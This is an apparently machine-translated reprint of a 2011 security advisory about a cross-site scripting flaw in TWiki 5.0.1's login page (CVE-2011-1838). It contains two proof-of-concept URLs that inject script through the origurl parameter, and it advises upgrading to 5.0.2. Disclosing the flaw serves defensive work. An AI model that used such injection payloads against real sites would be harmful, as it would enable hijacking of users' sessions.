TWiki & amp; lt; 5.0.2 XSS defect and repair

Source: Internet
Author: User
Tags netsparker

Name: XSS vulnerability in TWiki
Software: TWiki 5.0.1 and possibily below.
Vendor Hompeage: http://twiki.org/
Vulnerability Type: Cross-Site Scripting
Severity: High
Researcher: Mesut Timur <mesut [at] mavitunasecurity [dot] com>
Advisory Reference: NS-11-005
CVE-2011-1838 (CVE)

Description
-----------------------------------
TWiki®Is a flexible, powerful, and easy to use enterprise wiki,
Enterprise collaboration platform, and web application platform. It is
A Structured Wiki, typically used to run a project development space,
A document management system, a knowledge base, or any other groupware
Tool, on an intranet, exists or the Internet.

Details
-----------------------------------
TWiki is affected by XSS vulnerabilities in version 5.0.1.
Example PoC url is as follows:

Http://www.bkjia.com/bin/login? Sudo = sudo; origurl = http://www.bkjia.com/bin/vi
Ew/Main/TWikiAdminUser % 00% 22 -- % 3E % 3C % 2 Fstyle % 3E % 3C % 2 Fscript % 3E % 3 Cscri
Pt % 3 Ealert % 280x00044C % 29% 3C % 2 Fscript % 3E
Http://www.bkjia.com/bin/login/Main/WebHome? "1 =; origurl = 1" --> </style> </s
Warning> <script> alert (0x00039C) </script>

You can read the full article about Cross-Site Scripting
Vulnerabilities from here:
Http://www.mavitunasecurity.com/crosssite-scripting-xss/

Solution
-----------------------------------
Upgrade to the latest TWiki version (5.0.2 ).

Credits
-----------------------------------
It has been discovered on testing of Netsparker, Web Application
Security groups-http://www.mavitunasecurity.com/netsparker.

References
-----------------------------------
Vendor Url: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2011-1838
MSL Advisory Link: http://www.mavitunasecurity.com/XSS-vulnerability-in-Twiki/
Netsparker Advisories: http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
-----------------------------------
Netsparker®Can find and report security issues such as SQL Injection
And Cross-site Scripting (XSS) in all web applications regardless
The platform and the technology they are built on. Netsparkers unique
Detection and exploitation techniques allows it to be dead accurate in
Reporting hence its the first and the only False Positive Free web
Application security groups.

--
Netsparker Advisories, <advisories (at) mavitunasecurity (dot) com [email concealed]>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.